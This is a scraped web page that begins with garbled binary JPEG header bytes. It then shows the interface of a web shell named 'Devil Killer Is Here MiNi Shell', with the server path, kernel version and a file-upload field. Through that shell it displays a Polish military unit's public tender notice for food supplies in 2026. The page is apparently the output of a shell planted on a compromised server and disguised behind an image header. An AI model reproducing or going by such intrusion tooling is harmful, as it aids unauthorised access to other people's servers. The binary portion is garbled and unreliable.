JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20251121/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20251121/0054963801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa różnych produktów spożywczych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">10 Brygada Logistyczna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 532213882</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. ks. Bolesława Domańskiego 68</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-820</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">10blog.zampubliczne@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.10blog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka Wojskowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa różnych produktów spożywczych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-17a26a60-4d8e-4eab-9884-e1543c60c4e3</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00549638</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00130882/23/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.11 Dostawa różnych produktów spożywczych na rok 2026.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/10blog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za<br/>pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/10blog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a. Postępowanie prowadzone jest w<br/>języku polskim, przy użyciu środków komunikacji elektronicznej, na platformie zakupowej, dalej platforma, pod adresem:<br/>platformazakupowa.pl/pn/10blog. Platforma zapewnia integralność, autentyczność, nienaruszalność i poufność przesyłanych plików i<br/>informacji.<br/>b. Zamawiający udostępnia wykonawcy dokumenty w zakładce „Załączniki do postępowania”.<br/>c. Wiadomości od zamawiającego wyświetlają się w zakładce „Komunikaty”. Wykonawca ma obowiązek sprawdzać wiadomości od<br/>zamawiającego bezpośrednio na platformie, gdyż system powiadomień może ulec awarii lub powiadomienia mogą trafić do folderu<br/>Spam. Wykonawca kontaktuje się z zamawiającym w zakładce „Komunikaty”, klikając w przycisk „Wyślij wiadomość do<br/>zamawiającego”.<br/>d. Zamawiający dopuszcza komunikację ustną jedynie w sytuacjach wyjątkowych np. podczas awarii platformy i tylko w zakresie<br/>informacji nieistotnych. Zamawiający nie przewiduje użycia innych środków komunikacji ze względu na sytuacje, o których mowa w<br/>art. 65 ust. 1, art. 66 i art. 69 uPZP.<br/>e. Wykonawca składa ofertę w zakładce Formularz, klikając w przycisk „Dołącz Plik”. Wykonawca ma obowiązek złożyć dokumenty<br/>jawne w odpowiednio oznaczonym i wydzielonym pliku dla dokumentów jawnych, a dokumenty niejawne w odpowiednio oznaczonym<br/>i wydzielonym pliku dla dokumentów niejawnych.<br/>f. Na wykonawcy spoczywa obowiązek wykazania, że przekazane zamawiającemu informacje niejawne stanowią tajemnicę<br/>przedsiębiorstwa, w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, w przeciwnym<br/>razie zamawiający ma możliwości ich odtajnienia.<br/>g. Zamawiający nie ponosi odpowiedzialności za złożenie oferty przez wykonawcę w sposób niezgodny z instrukcją, np. gdy<br/>wykonawca złoży ofertę poprzez zakładkę „Komunikaty”. Oferta złożona w ten sposób zostanie odrzucona ponieważ nie został<br/>spełniony obowiązek wynikający z art. 221 uPZP.<br/>h. Wykonawca przystępując do postępowania akceptuje „Regulamin” platformy i ma obowiązek zapoznać się i postępować zgodnie<br/>z „Instrukcją dla Wykonawców”, która znajduje się na platformie.<br/>i. Aby korzystać z platformy wykonawca powinien posiadać: stały dostęp do sieci Internet o przepustowości nie mniejszej niż 512<br/>kb/s; komputer PC lub MAC o pamięci min. 2 GB Ram; procesor Intel IV 2 GHZ; systemem operacyjnym Windows 7, Mac Os x 10 4,<br/>Linux lub ich nowszą wersję; zainstalowaną inną niż Internet Explorer przeglądarkę internetową; włączoną obsługę JavaScript;<br/>zainstalowany program Adobe Acrobat Reader lub inny, obsługujący format pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">a.	Zgodnie z obowiązkiem informacyjnym, o którym mowa w art. 13 ust. 1-3 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych), zwane dalej RODO, zamawiający informuje, że:<br/>	Administratorem Pani/Pana danych osobowych jest 10 Brygada Logistyczna w Opolu, a Inspektorem Danych Osobowych Grzegorz Skoczka: g.skoczka@ron.mil.pl.<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem.<br/>	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 uPZP.<br/>	Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 uPZP przez okres 4 lat od dnia zakończenia postępowania, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach uPZP, związanym z udziałem w postępowaniu.<br/>	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>	Posiada Pani/Pan:<br/>	prawo dostępu do danych osobowych Pani/Pana dotyczących (art. 15 RODO). W przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania;<br/>	prawo do sprostowania Pani/Pana danych osobowych (art. 16 RODO). Skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania, ani zmianą postanowień umowy w zakresie niezgodnym z uPZP, oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>	prawo żądania od administratora ograniczenia przetwarzania danych osobowych (art. 18 RODO) z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego;<br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>	Nie przysługuje Pani/Panu:<br/>	prawo do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO i prawo do przenoszenia danych, o którym mowa w art. 20 RODO;<br/>	prawo sprzeciwu wobec przetwarzania danych osobowych, na podstawie art. 21 RODO, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; <br/>	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">9/ŻYW/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 550899,24 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa oleje i tłuszcze roślinne </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 79433,40 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15400000-2 - Oleje i tłuszcze zwierzęce lub roślinne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> a.	Zamawiający przewiduje prawo opcji na wszystkie części zamówienia. Ofertę, pod groźbą jej odrzucenia, należy złożyć zarówno na zamówienie podstawowe jak i opcjonalne.<br/>b.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Nie skorzystanie z prawa opcji lub skorzystanie tylko z jej części, nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>c.	Szczegóły związane z realizacją prawa opcji znajdują się w Projektowanych postanowieniach umowy – załączniki nr 1.1-1.2 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a.	Najkorzystniejszą będzie oferta, która przedstawia najkorzystniejszy bilans ceny (kosztu) suma zamówienia podstawowego i opcjonalnego.<br/>b.	Kryterium oceny ofert jest<br/>	C/ cena, waga 100 %, maksymalna liczba punktów 100, obliczona wg wzoru:<br/>	C = (koszt najniższej ceny oferty brutto/koszt ceny badanej oferty brutto) X 100 %<br/>c.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma największą liczbę punktów, zaokrąglonych do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa sosów, zup, przypraw przetworzonych </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 143441,14 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15890000-3 - Różne produkty spożywcze i produkty suszone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> a.	Zamawiający przewiduje prawo opcji na wszystkie części zamówienia. Ofertę, pod groźbą jej odrzucenia, należy złożyć zarówno na zamówienie podstawowe jak i opcjonalne.<br/>b.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Nie skorzystanie z prawa opcji lub skorzystanie tylko z jej części, nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>c.	Szczegóły związane z realizacją prawa opcji znajdują się w Projektowanych postanowieniach umowy – załączniki nr 1.1-1.2 do SWZ <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a.	Najkorzystniejszą będzie oferta, która przedstawia najkorzystniejszy bilans ceny (kosztu) suma zamówienia podstawowego i opcjonalnego.<br/>b.	Kryterium oceny ofert jest<br/>	C/ cena, waga 100 %, maksymalna liczba punktów 100, obliczona wg wzoru:<br/>	C = (koszt najniższej ceny oferty brutto/koszt ceny badanej oferty brutto) X 100 %<br/>c.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma największą liczbę punktów, zaokrąglonych do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa kawy i herbaty </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 33693,40 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15860000-4 - Kawa, herbata i podobne produkty</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> a.	Zamawiający przewiduje prawo opcji na wszystkie części zamówienia. Ofertę, pod groźbą jej odrzucenia, należy złożyć zarówno na zamówienie podstawowe jak i opcjonalne.<br/>b.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Nie skorzystanie z prawa opcji lub skorzystanie tylko z jej części, nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>c.	Szczegóły związane z realizacją prawa opcji znajdują się w Projektowanych postanowieniach umowy – załączniki nr 1.1-1.2 do SWZ <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a.	Najkorzystniejszą będzie oferta, która przedstawia najkorzystniejszy bilans ceny (kosztu) suma zamówienia podstawowego i opcjonalnego.<br/>b.	Kryterium oceny ofert jest<br/>	C/ cena, waga 100 %, maksymalna liczba punktów 100, obliczona wg wzoru:<br/>	C = (koszt najniższej ceny oferty brutto/koszt ceny badanej oferty brutto) X 100 %<br/>c.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma największą liczbę punktów, zaokrąglonych do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa miodu </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 3134,40 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15831600-8 - Miód</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> a.	Zamawiający przewiduje prawo opcji na wszystkie części zamówienia. Ofertę, pod groźbą jej odrzucenia, należy złożyć zarówno na zamówienie podstawowe jak i opcjonalne.<br/>b.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Nie skorzystanie z prawa opcji lub skorzystanie tylko z jej części, nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>c.	Szczegóły związane z realizacją prawa opcji znajdują się w Projektowanych postanowieniach umowy – załączniki nr 1.1-1.2 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a.	Najkorzystniejszą będzie oferta, która przedstawia najkorzystniejszy bilans ceny (kosztu) suma zamówienia podstawowego i opcjonalnego.<br/>b.	Kryterium oceny ofert jest<br/>	C/ cena, waga 100 %, maksymalna liczba punktów 100, obliczona wg wzoru:<br/>	C = (koszt najniższej ceny oferty brutto/koszt ceny badanej oferty brutto) X 100 %<br/>c.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma największą liczbę punktów, zaokrąglonych do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 